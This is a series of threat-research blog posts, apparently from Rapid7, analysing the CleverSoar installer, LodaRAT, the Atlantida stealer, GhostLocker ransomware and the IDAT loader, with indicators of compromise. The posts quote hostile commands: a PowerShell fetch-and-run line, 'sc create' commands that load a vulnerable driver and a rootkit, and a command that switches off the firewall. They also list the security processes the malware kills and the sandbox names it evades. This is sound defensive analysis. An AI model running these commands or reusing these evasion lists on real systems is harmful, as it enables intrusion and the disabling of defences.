Natalie Zargarov – CyberSecurity Confabulation

New “CleverSoar” Installer Targets Chinese and Vietnamese Users

CleverSoar Installer Used to Deploy Nidhogg Rootkit and Winos4.0 Framework Against Targeted Users

In early November, Rapid7 Labs identified a new, highly evasive malware installer, 'CleverSoar,' targeting Chinese and Vietnamese-speaking victims. CleverSoar is designed to deploy and protect multiple malicious components within a campaign, including the advanced Winos4.0 framework and the Nidhogg rootkit. These tools enable capabilities such as keystroke logging, data exfiltration, security bypasses, and covert system control, suggesting that the campaign is part of a potentially prolonged espionage effort. Rapid7 Labs’ findings indicate a sophisticated and persistent threat, likely focused on data capture and extended surveillance.

Distribution

While the majority of CleverSoar installer-related binaries were detected in November 2024, we discovered that the initial version of these files was uploaded to VirusTotal in late July of this year. The malware distribution begins with a .msi installer package, which extracts the files and subsequently executes the CleverSoar installer.

Victimology

The CleverSoar installer, as detailed in the Technical Analysis section, checks the user’s language settings to verify if they are set to Chinese or Vietnamese. If the language is not recognized, the installer terminates, effectively preventing infection. This behavior strongly suggests that the threat actor is primarily targeting victims in these regions. Based on the folder names generated by the malicious .msi files (e.g., Wegame, Installer), we infer that the .msi installer is being distributed as fake software or gaming-related applications.

Attribution

Rapid7 Labs was unable to attribute the installer to a specific known threat actor. However, due to similarities in campaign characteristics, we suspect with medium confidence that the same threat actor may be responsible for both the ValleyRAT campaign and the new campaign, both reported by Fortinet this year. The techniques employed in the CleverSoar installer suggest that the threat actor possesses advanced skills and a comprehensive understanding of Windows protocols and security products.

Rapid7 Customers

InsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following rule will alert on a wide range of malicious hashes tied to behavior in this blog: Suspicious Process - Malicious Hash On Asset.

Technical Analysis

This technical analysis will cover the CleverSoar installer used to evasively deploy the Nidhogg rootkit, Winos4.0 framework and the custom backdoor (T1105). The installer is also responsible for disabling security solutions (T1562.001) and making sure to infect only machines with Chinese or Vietnamese system languages (T1614.001).

File Information:

Given our high confidence that the malicious files were dropped by a .msi package (T1218.007), which in our case creates a 'WindowsNT' folder under the 'C:\Program Files (x86)' directory, we also assume that the same .msi package is responsible for dropping all the payloads listed below and executing the 'Update.exe' binary.

The installer begins by verifying the existence of the 'C:\cs' folder.It subsequently checks if the process is elevated by executing 'GetTokenInformation' and passing 'TokenElevation' (0x14) as a TokenInformationClass (T1134). If the process is not elevated, the malware will utilize the 'runas' operation of 'ShellExecuteA' to execute the process with Administrator privileges (T1134.002).

Subsequently, it proceeds to a series of evasion techniques, commencing with a rarely employed one.

Firmware Table Anti-VM

The malware retrieves a raw SMBIOS firmware table by invoking 'GetSystemFirmwareTable' and verifying a specific value presence. In our instance, the installer checks for 'QEMU' (indicating a free string open-sourced emulator) presence in the returned buffer (T1497.001). This technique is a sophisticated Anti-VM method as certain memory regions utilized by the operating system contain distinctive artifacts when the operating system is executed within a virtual environment. Notably, this technique has been previously employed by the Raspberry Robin malware, but in a slightly different way.

Windows Defender Emulator

The installer employs the 'LdrGetDllHandleEx' and 'RtlImageDirectoryEntryToData' functions to ascertain the state of Windows Defender’s emulator (T1497.001). Additionally, it utilizes the 'NtIsProcessInJob' and 'NtCompressKey' functions for the same purpose. These three anti-emulation techniques are publicly available in the UACME open-source project. Upon successful completion of these anti-emulation checks, the installer logs that defender checks were successfully bypassed and proceeds to the subsequent check.

Windows 10 or Windows 11

Initially, the installer verifies the operating system version by invoking the 'GetVersionExW' function (T1082). To identify whether the malware is executing on the Windows 10 operating system or Windows 11, the presence of the 'C:\Windows\System32\Taskbar.dll' file is checked, as this file can only be found on Windows 11 operating systems.

3rd Party DLL Injection Prevention

The CleverSoar installer modifies the processes mitigation policy to include the restriction 'Signatures restricted (Microsoft only)' (T1543). This action prevents non-Microsoft-signed binaries from being injected into the affected process. By implementing this technique, Anti-Virus and EDR solutions that employ userland hooking cannot inject their DLLs into the running process.

Timing Anti-Debug

The installer also executes timing anti-debug checks by invoking the 'GetTickCount64' function twice and measuring the delay between instructions and their execution (T1622).

Simple Anti-Debug check

The CleverSoar installer employs the 'IsDebuggerPresent' API call to ascertain whether the process is currently undergoing debugging (T1622).

Anti-Sandbox/Anti-VM Username Check

Upon the successful completion of all preceding checks, the malware retrieves the current username and subsequently compares it to the following (T1497.001):

'CurrentUser, Sandbox, Emily, HAPUBWS, Hone Lee, IT-ADMIN, Johnaon, Miller, miloza, Peter Wilson, timmy, sand box, malware, maltest, test user, virus, John Doe, 9ZaXj, WALKER, vbccsb_*, vbccsb.'

While most of these usernames are well known for being used by sandboxes and emulator solutions, two of them seem to be misspelled: 'Hone Lee' instead of 'Hong Lee' and 'Johnaon' instead of 'Johnson'.

There are two possible reasons for this misspell, first, the threat actor typed those names manually, and the second one might be, the threat actor found that those are more recent names used by sandboxes.

Once the username check bypass is successfully executed, the malware proceeds to complete the evasion phase and initiates its malicious actions.

Malicious Activity

Upon successful completion of all environmental checks, the installer proceeds to the system language verification. This process involves retrieving the language identifier (ID) for the user interface language and verifying if that ID corresponds to one of the Chinese language IDs (0x804, 0xC04, 0x1404, 0x1004) or the Vietnamese ID (0x42A). If the language ID does not match any of these identifiers, the malware terminates its execution (T1614.001).

This observation suggests a potential threat actor’s intention to target only endpoints within these two countries.

Subsequently, the installer creates the 'HKCU\SOFTWARE\Magisk' (T1112) registry key and searches for the 'ring3_username' value under it. If the value is not present, the malware retrieves the user name that the 'explorer.exe' process is running as and sets the 'ring3_username' value.

The installer verifies if virtualization is enabled in the firmware and made available by the operating system by calling 'IsProcessorFeaturePresent' with 0x15 (PF_VIRT_FIRMWARE_ENABLED) and creates the 'INIT.dat' file in the 'C:\Program Files (x86)\Windows NT' directory. Next, it enumerates processes and checks if one of 'ZhuDongFangYu.exe', 'QHActiveDefense.exe', 'HipsTray.exe', or 'HipsDaemon.exe' is running (T1518.001). The first two processes belong to 360 Total Security (Chinese Anti-Virus Software), and the last two belong to HeroBravo System Diagnostics. If one of these processes is discovered, the installer proceeds to adjust 'Se_Debug_Privilege' to the running process (T1134), enumerates running processes once again, searches for 'lsass.exe' and writes into that process (T1055). Unfortunately, we were unable to retrieve the written payload due to an unhandled runtime error. It is noteworthy that during our investigation, we identified several installer versions, and most of them encountered unhandled runtime errors and could not execute.

Upon successful completion of the preceding checks, the installer proceeds to verify the existence of the 'CleverSoarInst' service. If the service is not detected, the installer opens a named '\\.\pipe\ntsvcs' pipe, which is linked to the RPC protocol, to establish a temporary service responsible for creating the 'CleverSoar' service (T1569.002). This temporary service will only execute once, executing the following command: 'cmd /c start sc create CleverSoar' displayname= CleverSoar binPath= “C:\Program Files (x86)\Windows NT\tProtect.dll” type= kernel start= auto'.

This command will create a new 'CleverSoar' service that will commence executing a driver at the system’s startup. The DLL specified within this service is one of the previously dropped files and is, in fact, a vulnerable Sysmon driver commonly employed by threat actors to disable security software. The installer initiates the 'CleverSoar' service and establishes a named '\\.\TfSysMon' pipe connection. Subsequently, it enumerates the currently running processes once more (T1057), searching for any instances that contain one of the following strings:

Security Product	String
Bkav Pro	bka, blu
Windows Security	sechealthui, security, smartscreen, msmpeng, mssecess, mpcmdrun, defender
360 Total Security	360, zhudongfangyu, dsmain, qhactive, wdswfsafe, softmgr, 360se, 360chrome, 360zip
Kingsoft	ksafe, kwatch, kxecenter, kislive, kxetray, kxemain, kxewsc, kscan, kxescore, xdict
Huorong Internet Security	wsctrlsvc, usysdiag, hrsword
HeroBravo System Diagnostics	hips
Kaspersky	kav, avp, kis
2345 Security Guard	2345
Tencent	qqpc
McAfee	mcshield, mcapexe, mfemms
Avira	avira, sentryeye
Eset	eset, boothelper, efwd, egui, ekrn.exe, eguiproxy.exe
Elastic Security	elastic, agentbeat.exe, apm-server.exe
Rising Anti-Virus	ravmond.exe, rsmain.exe, rstray, rsmgrsvc
Monitoring and debugging tools	dbg, pchunter, hacker, monitor, wireshark
Other	lenovo, calc.exe, regedit
Unknown	remotectrlaid, superki, mfeavsv, 52pojie, kl_, watchdog

If one of the listed processes is discovered, the installer employs the 'DeviceIoControl' API call, specifying the process ID and the '0B4A00404h' IoControl code. Upon our examination of the Sysmon driver, this action results in the termination of the identified process (T1489).

Subsequently, CleverSoar installer enumerates the files present in the folder generated by the malware and modifies their attributes by adding 0x6 (FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM). This modification is intended to evade file detection mechanisms (T1564.001).

The next phase involves the installation of a rootkit by creating a service which will run a rootkit dll in system startup. The installer initiates a verification process to ascertain the presence of a service named 'Nidhogg.' If the service is not already in existence, it proceeds to execute the command 'sc create Nidhogg displayname= Nidhogg binPath= “C:\Program Files (x86)\Windows NT\curl.dll” type= kernel start= auto' to create a new 'Nidhogg' service (T1543.003). The service will execute an open-sourced Nidhogg rootkit at system startup (T1014).

CleverSoar employs a persistence mechanism by executing a scheduled task upon user login (T1053). This task is initiated by dropping a .xml file into the user’s temporary folder, which contains a scheduled task XML file. By utilizing the same RPC service method previously mentioned, the installer constructs a service responsible for executing a command that creates the scheduled task with the 'Corp' name. The created task is concealed by modifying the 'Index' value under 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Corp' registry key to 0 (T1564).

After persistence set, the installer turns the Windows firewall off by executing the 'netsh advfirewall set allprofiles state off' command (T1562.004).

The malware now proceeds to the next stages of execution. Firstly, it checks if the 'winnt.exe' binary exists within the malware-created folder. In the event of its presence, the installer executes a command to create a scheduled task that will execute the binary once and immediately delete the scheduled task. The task responsible for executing the 'winnt.exe' is named 'PayloadTask1'. If the binary is not present in the folder, the installer will persistently enumerate the folder and search for it. Based on our analysis of the 'winnt.exe' binary, it appears to be a Winos4.0 command-and-control (C2) framework implant that has recently been covered in Trend Micro’s report.

The installer executes the same process with the 'runtime.exe' binary. The task responsible for executing this binary is designated as 'PayloadTask2'. Based on our investigation, 'runtime.exe' appears to be a custom backdoor, facilitating communication with the C2 server via a proprietary protocol.

By the time of the investigation the C2 server was already down and Rapid7 Labs could not continue the further analysis of interaction between the C2 server and the malware.

Conclusion

The CleverSoar campaign highlights an advanced and targeted threat, employing sophisticated evasion techniques and highly customized malware components like the Winos4.0 framework and Nidhogg rootkit. The campaign's selective targeting of Chinese and Vietnamese-speaking users, along with its layered anti-detection measures, points to a persistent espionage effort by a capable threat actor. While currently aimed at individual users, this campaign's tactics and tools demonstrate a level of sophistication that could easily extend to organizational targets. Organizations in the affected regions should take notice of the TTPs of this actor and monitor suspicious activity.

IOCs

F70b34e2b1716528a3c3fffdbfc008003b9685f1a4da2e5a6052612de92b0c68	CleverSoar installer
156.224.26.7	Winos4.0 C2
8848.twilight.zip	Backdoor C2

References

LodaRAT: Established malware, new victim patterns

Posted 4 months ago by Natalie Zargarov

Executive Summary

LodaRAT: Established malware, new victim patterns

Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave. LodaRAT, first observed in 2016, is a remote access tool (RAT) written in AutoIt. Development of LodaRAT has continued over the past 8 years, with an Android version distributed in the wild since 2021. This article analyzes the Windows version only.

Originally created for information gathering, LodaRAT has a variety of capabilities for collecting and exfiltrating victim data, delivering additional malware, capturing the victim’s screen, controlling the victim camera or mouse, and even spreading in infected environments. Notably, this appears to be the only update made to that RAT since 2022. Even the embedded DLLs remain the same.

Distribution

Old versions of LodaRAT were using Phishing (T1566) and Known Vulnerability Exploitation (T1203) techniques in their delivery process, but Rapid7 spotted new versions being distributed by DonutLoader (S0695) and CobaltStrike (S0154). We also observed LodaRAT on systems infected with other malware families like AsyncRAT (S1087), Remcos (S0332), Xworm, and more. Though we aren’t able to say for sure whether LodaRAT was distributed with those malware families or simply present by coincidence. New LodaRAT samples masquerade (T1036) as well-known Windows software such as Discord, Skype, and Windows Update, amongst others.

Victimology

While in previous campaigns the threat actor behind this RAT showed interest in specific country-based organizations, the new campaign seems to infect victims all over the world. Approximately 30% of VirusTotal samples were uploaded from the USA.

Attribution

LodaRAT was attributed to the Kasablanka APT by Cisco in 2021; the group was focused on information gathering and espionage targeting Russia and Bangladesh in 2022. The 2024 campaign observed by Rapid7 shows a notable shift in threat actor behavior — i.e., preferring worldwide distribution over specific regional targets — and therefore we would not necessarily attribute this year's campaign to the same APT. Being an AutoIt compiled binary, LodaRAT source code can be easily extracted and customized by a skilled threat actor. Rapid7 also found a GitHub repository with leaked LodaRAT source code. Based on capabilities, variable names, and strings, the leaked code is a four-year-old LodaRAT version, meaning adversaries have had plenty of time to analyze and update the code in newer versions.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this malware campaign:

Suspicious Process - LodaRAT Malware Executed
Suspicious Process - Renamed AutoIt Interpreter

Technical Analysis

In this section we will briefly describe the overall capabilities of LodaRAT. For the full capability list, please see our LodaRAT repository on GitHub. It's worth mentioning that most of the LodaRAT samples we investigated as part of the 2024 campaign had a string obfuscation mechanism. We build a Python script to decrypt those strings and make an AutoIt script human-readable.

The LodaRAT string deobfuscator is available to the community and can be downloaded here. Some of the samples were also packed with the UPX packer.

LodaRAT execution starts with a check for a specifically named window — for example, `UOMGAYFFBC`. This is done to make sure that only one instance of the malware is executed on the system. Next, the malware changes its window title. It also checks whether the infected OS is Windows 10 or 11. Then, it defines local variables and facilitates registry persistence by adding a new value under the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key (T1547.001). Persistence is not always achieved by adding a new registry value. However, Rapid7 observed that some LodaRAT samples instead created a new scheduled task that will execute a compiled AutoIt every minute (T1053), while others did not attempt to establish persistence at all. Interestingly, in both cases where Rapid7 did not observe a new registry value being added for persistence, the malware still attempted to delete the registry value during the uninstall process.

The malware also checks if one of the following registry values is set:

HKCU\Software\Win32\data
HKCU\Software\Win32\img
HKCU\Software\Win32\keyx
HKCU\Software\Win32\imgCli
HKCU\Software\Win32\pidx

All the above keys are set by the malware in response to a specific command from the command-and-control (C2) server. The malware checks whether Windata and Windata\mon folders exist in the user's %AppData% directory, and if not, it creates them. It also sets the mon directory attributes to System and Hidden to evade detection (T1564.001).

The malware will then start a TCP connection to the C2 server, capture the victim's screen, and save the capture in the mon folder (T1113). The C2 beacon contains basic victim information, such as:

Whether the user has Administrator rights; if they do, the Admin string will be passed to the C2 server, otherwise the passed parameter will be a string that varies from sample to sample.
Username
OS version and architecture
Whether any anti-virus(AV) solution is running on the system; the malware will tell the C2 server No if no AV solution is found, and Disabled in cases where it is present but not running.
Host IP address
Desktop resolution
Whether the endpoint is a laptop or a desktop
Number of files in the mon folder

In the response, the RAT waits on a command from the C2 server. While a full list of LodaRAT capabilities can be found here, notable capabilities include:

Downloading and executing additional payloads: We were able to spot the use of the ngrok reverse proxy utility based on the command the malware executes when receiving it from the C2 server. We can also assess with medium confidence that one other tool downloaded from the C2 server is a lateral movement utility that exploits the SMB protocol to drop and/or execute a malicious binary on a remote host. This assumption is based on malware’s attempt to connect to an internal IP on port 445, after which it receives a tool from the C2 server and uses that utility to run .bin file on the remote host.
Executing commands on the victim's host
Controlling the victim’s mouse
Screen capturing
Stealing browser cookies and credentials
Disabling Windows Firewall
File enumeration and exfiltration
Webcam recording
Microphone recording
New local user creation

In addition, the malware is capable of opening and closing a CD tray, creating a GUI chat window while the conversation is saved to a file.

IOCs

An updated IOC list can be found here.

Conclusion

LodaRAT shows that even older malware can still be a serious threat if it works well enough. While new malware families pop up all the time with fancy updates, LodaRAT has stayed mostly the same since 2021, yet it’s still spreading and infecting systems worldwide. The recent campaign, with its ability to steal credentials from browsers like Microsoft Edge and Brave, proves that small tweaks can keep malware effective without major updates. The fact that LodaRAT keeps working so well reminds us that even older threats shouldn't be underestimated.

Whispers of Atlantida: Safeguarding Your Digital Treasure

Posted 1 year ago by Natalie Zargarov

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.

Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim's screen and collects hardware data.

Technical Analysis

Stage 1 - Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:

The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .

Stage 2 - Three levels of in-memory loading

The executed PowerShell command downloads and executes a next stage PowerShell script in memory.

The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.

Stage 3 - Atlantida Stealer

The Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the string found in the executable.

First, the Atlantida stealer captures the entire screen by using the combination of GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml” if it does, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:

The stealer reads all the files found under the enumerated path.

Next, it collects the victim's hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.

Steam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we observed it enumerating the Steam configuration directory and searches for the following files:

Ssfn - Steam Sentry File.
Config.vdf - Stream configuration file.
Loginusers.vdf - stores the records of previously logged-in Steam accounts.

The last thing that Atlantida is harvesting is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.

The stealer now connects to the hard coded C&C server (45.144.232.99). We accessed the hardcoded IP and got to the login page of what we assume is a stealers control panel, which also had an `Atlantida` title.

No data is passed to the C&C server this time and the stealer continues its collection. Differently from other stealers, Atlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofills.

One of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each Chrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within. Atlantida harvests data from the following cryptocurrency wallets extensions:

When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exists.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:

Suspicious Process - MSHTA Spawns PowerShell

MITRE ATT&CK Techniques:

IOCs

GhostLocker – A “Work In Progress” RaaS

Posted 1 year ago by Natalie Zargarov

Executive Summary

In recent years, there has been a noticeable uptick in threat actors venturing into the realm of Ransom-as-a-Service (RaaS). Some have emerged as significant threats, while others have faded into obscurity. What makes the current landscape unusual is the entry of hacktivist groups into this domain. One such group, GhostSec, has introduced a novel Ransom-as-a-Service encryptor known as GhostLocker. GhostSec's focus has predominantly been on well-established telecommunications companies, surveillance systems, and Internet of Things (IoT) devices.

GhostLocker is being marketed as a groundbreaking, enterprise-grade locking software that prioritizes safety and effectiveness above all else. Initially priced at $999 for the first 15 affiliates, GhostSec anticipates raising this fee to $4,999 in the future. This executive summary provides a snapshot of our investigation and key findings pertaining to this emerging ransomware variant.

GhostLocker RaaS was announced on October 8th, 2023 and since then several updates were made to the encryptor. Rapid7 researchers obtained several new GhostLocker samples and took a quick look at them. This blog — based on one of the first publicly available samples — and the analysis led us to the conclusion that the encryptor is still under development and lacks the basic capability to encrypt files.

Technical Analysis

Announced by GhostSec, the new GhostLocker encryptor’s major features include:

Military-grade encryption on runtime
Undetectability by using a polymorphic stub, and guaranteeing zero detections out of all major antivirus (AV) solutions
Protection against reverse engineering
Self-delete
Killing services
Automatic privilege escalation
Persistence mechanism
Watchdog process
Delayed encryption

GhostSec is also offering their affiliates a fully functional statistics and negotiation platform.

GhostSec used Python to create their encryptor. The first sample spotted by Rapid7 was a PyInstaller executable. PyInstaller is used to package Python code into standalone executable applications for various operating systems. It takes a Python script and generates a single executable file that contains all the necessary dependencies and can be run on computers that do not have Python installed. This allows for easy distribution and deployment of Python applications, as the user does not need to have Python and any required modules installed on their system in order to run the application. We extracted the python scripts from the installer. Most of the extracted files were legitimate public python libraries and the only one that caught our attention is the main.py script.

Main.py script seems to contain a hard-coded affiliate panel IP address and the fully implemented function that sends the infected machine name to the panel. The IP address is of a hosting company from which we have observed ransomware activity this year.

By checking the main function we can follow the exact attack flow of the GhostLocker encryptor. First, the encryption key will be created by using a Fernet encryption module which uses the Advanced Encryption Standard (AES) to encrypt data. The generate_key() method from the Fernet library is used to create a 32-byte URL-safe base64-encoded key, which is later used in the AES encryption procedure.

Next, it will generate the victim ID and retrieve the victim's username by using getpass Python library. The function getpass.getuser() is used to return the "login name" of the user. After all key generation is done, GhostLocker will send a json data containing the victim’s ID, encryption key, and the victim’s PC name to the attacker’s panel. And here is the first hint of ‘work in progress’ encryptor: the ‘pcname’ passed is hard-coded ‘hi’:

The victim's information and encryption key are sent in clear text via HTTP protocol, as shown in the image below:

After sending the victim info to the attacker's panel, the GhostLocker is supposed to start the encryption process; however, in the sample we analyzed, the encryption function was not implemented:

After the supposed encryption is done, GhostLocker will drop a ransom note to the Document folder:

The ransom note html file name is Imao which is an acronym to ‘Laughing My Ass Off’, although there is nothing funny for the victim in that note. It is either the attacker is meant to be laughing at the victim or that name is used just for the developer’s checks and will be changed in the future. The ransom note is pretty straightforward; it explains to the victim what happened to their files and how to contact the attacker. Weirdly, it dropped only to the `Documents` folder which makes it difficult to notice. It was observed that the attackers employed an end-to-end encrypted messaging platform, Session, as a source of communication between victims and the ransomware developers. The link to this messenger is embedded into the body of the ransom note, providing victims with a direct path to download the application.

After a closer look at the ransom note written in HTML format, it became evident that the ransom note was handcrafted rather than generated, as it contained syntax errors. A clear example of such an error can be seen in the word "paty" instead of "party," showing that most likely a human wrote it: “DO NOT try to decrypt your data using third paty software, it may cause permanent data loss.”

Additionally, the main.py contains the sendWebhook(msg) function. That function is designed to send a message or data to a Discord Webhook. The webhook URL is hardcoded in the code; however, we did not see the function being called and what kind of message is being sent to the attacker's discord channel. Though being fully implemented, this function was never called.

When executed for the first time, several embedded files are dropped into a new folder created in the user's temp directory. One of the files is a second stage executable that is executed as a child process of the installer. The installer waits until the child process exits by using WaitForSingleObject API call. When the child process exits, the installer implements the self delete feature and deletes all the dropped files.

The newer versions of GhostLocker are compiled with Nuitka. Nuitka compiles a Python program to a C binary — not by packaging the CPython runtime with the program bytecode, but by translating Python instructions into C. Compiling the malware with Nuitka makes it harder to investigate.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, all executed binaries will undergo comprehensive analysis against the hash reputation service to determine if it is a known malicious file and will alert on malicious hashes. Additionally, through our behavior-based detection rules we will be able to recognize patterns of activity associated with these threat actors in order to provide customers coverage and alerts to safeguard their systems before ransomware gets deployed.

MITRE ATT&CK Techniques

IOCs

References

https://docs.aspose.com/cells/python-java/pyinstaller-python/

https://github.com/pyca/cryptography/blob/main/src/cryptography/fernet.py#L66

https://getsession.org/download

https://nuitka.net/doc/user-manual.html

Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers

Posted 2 years ago by Natalie Zargarov

Technical Analysis by: Thomas Elkins, Natalie Zargarov
Contributions: Evan McCann, Tyler McGraw

Recently, Rapid7 observed the Fake Browser Update lure tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined a new loader is utilized in order to execute infostealers on compromised systems including StealC and Lumma.

The IDAT loader is a new, sophisticated loader that Rapid7 first spotted in July 2023. In earlier versions of the loader, it was disguised as a 7-zip installer that delivered the SecTop RAT. Rapid7 has now observed the loader used to deliver infostealers like Stealc, Lumma, and Amadey. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.

Prior to this technique, Rapid7 observed threat actors behind the lure utilizing malicious JavaScript files to either reach out to Command and Control (C2) servers or drop the Net Support Remote Access Trojan (RAT).

The following analysis covers the entire attack flow, which starts from the SocGholish malware and ends with the stolen information in threat actors’ hands.

Technical Analysis

Threat Actors (TAs) are often staging their attacks in the way security tools will not detect them and security researchers will have a hard time investigating them.

Stage 1 - SocGholish

First observed in the wild as early as 2018, SocGholish was attributed to TA569. Mainly recognized for its initial infection method characterized as "drive-by" downloads, this attack technique involves the injection of malicious JavaScript into compromised yet otherwise legitimate websites. When an unsuspecting individual receives an email with a link to a compromised website and clicks on it, the injected JavaScript will activate as soon as the browser loads the page.

The injected JavaScript investigated by Rapid7 loads an additional JavaScript that will access the final URL when all the following browser conditions are met:

The access originated from the Windows OS
The access originated from an external source
Cookie checks are passed

This prompt falsely presents itself as a browser update, with the added layer of credibility coming from the fact that it appears to originate from the intended domain.

Once the user interacts with the “Update Chrome” button, the browser is redirected to another URL where a binary automatically downloads to the user's default download folder. After the user double clicks the fake update binary, it will proceed to download the next stage payload. In this investigation, Rapid7 identified a binary called ChromeSetup.exe, the file name widely used in previous SocGholish attacks.

Stage 2 - MSI Downloader

ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package from: hxxps://ocmtancmi2c5t[.]xyz/82z2fn2afo/b3/update[.]msi.

In similar investigations, Rapid7 observed that the initial dropper executable appearance and file name may vary depending on the user’s browser when visiting the compromised web page. In all instances, the executables contained invalid signatures and attempted to download and install an MSI package.

Rapid7 determined that the MSI package executed with several switches intended to avoid detection:

/qn to avoid an installation UI
/quiet to prevent user interaction
/norestart to prevent the system from restarting during the infection process

When executed, the MSI dropper will write a legitimate VMwareHostOpen.exe executable, multiple legitimate dependencies, and the malicious Dynamic-Link Library (DLL) file vmtools.dll. It will also drop an encrypted vmo.log file which has a PNG file structure and is later decrypted by the malicious DLL.
Rapid7 spotted an additional version of the attack where the MSI dropped a legitimate pythonw.exe, legitimate dependencies, and the malicious DLL file python311.dll. In that case, the encrypted file was named pz.log, though the execution flow remains the same.

Stage 3 - Decryptor

When executed, the legitimate VMWareHostOpen.exe loads the malicious vmtools.dll from the same directory as from which the VMWareHostOpen.exe is executed. This technique is known as DLL Search Order Hijacking.

During the execution of vmtools.dll, Rapid7 observed that the DLL loads API libraries from kernel32.dll and ntdll.dll using API hashing and maps them to memory. After the API functions are mapped to memory, the DLL reads the hex string 83 59 EB ED 50 60 E8 and decrypts it using a bitwise XOR operation with the key F5 34 84 C3 3C 0F 8F, revealing the string vmo.log. The file is similar to the Vmo\log directory, where Vmware logs are stored.

The DLL then reads the contents from vmo.log into memory and searches for the string …IDAT. The DLL takes 4 bytes following …IDAT and compares them to the hex values of C6 A5 79 EA. If the 4 bytes following …IDAT are equal to the hex values C6 A5 79 EA, the DLL proceeds to copy all the contents following …IDAT into memory.

Once all the data is copied into memory, the DLL attempts to decrypt the copied data using the bitwise XOR operation with key F4 B4 07 9A. Upon additional analysis of other samples, Rapid7 determined that the XOR keys were always stored as 4 bytes following the hex string C6 A5 79 EA.

Once the DLL decrypts the data in memory, it is decompressed using the RTLDecompressBuffer function. The parameters passed to the function include:

Compression format
Size of compressed data
Size of compressed buffer
Size of uncompressed data
Size of uncompressed buffer

The vmtools.dll DLL utilizes the compression algorithm LZNT1 in order to decompress the decrypted data from the vmo.log file.

After the data is decompressed, the DLL loads mshtml.dll into memory and overwrites its .text section with the decompressed code. After the overwrite, vmtools.dll calls the decompressed code.

Stage 4 - IDAT Injector

Similarly to vmtools.dll, IDAT loader uses dynamic imports. The IDAT injector then expands the %APPDATA% environment variable by using the ExpandEnvironmentStringsW API call. It creates a new folder under %APPDATA%, naming it based on the QueryPerformanceCounter API call output and randomizing its value.

All the dropped files by MSI are copied to the newly created folder. IDAT then creates a new instance of VMWareHostOpen.exe from the %APPDATA% by using CreateProcessW and exits.

The second instance of VMWareHostOpen.exe behaves the same up until the stage where the IDAT injector code is called from mshtml.dll memory space. IDAT immediately started the implementation of the Heaven’s Gate evasion technique, which it uses for most API calls until the load of the infostealer is completed.

Heaven's Gate is widely used by threat actors to evade security tools. It refers to a method for executing a 64-bit process within a 32-bit process or vice versa, allowing a 32-bit process to run in a 64-bit process. This is accomplished by initiating a call or jump instruction through the use of a reserved selector. The key points in analyzing this technique in our case is to change the process mode from 32-bit to 64-bit, the specification of the selector “0x0033” required and followed by the execution of a far call or far jump, as shown in Figure 8.

Figure 8 - Heaven’s Gate technique implementation

The IDAT injector then expands the %TEMP% environment variable by using the ExpandEnvironmentStringsW API call. It creates a string based on the QueryPerformanceCounter API call output and randomizes its value.

Next, the IDAT loader gets the computer name by calling GetComputerNameW API call, and the output is randomized by using rand and srand API calls. It uses that randomized value to set a new environment variable by using SetEnvironmentVariableW. This variable is set to a combination of %TEMP% path with the randomized string created previously.

Now, the new cmd.exe process is executed by the loader. The loader then creates and writes to the %TEMP%\89680228 file.

Next, the IDAT injects code into cmd.exe process by using NtCreateSection + NtMapViewOfSection Code Injection technique. Using this technique the malware:

Creates a new memory section inside the remote process by using the NtCreateSection API call
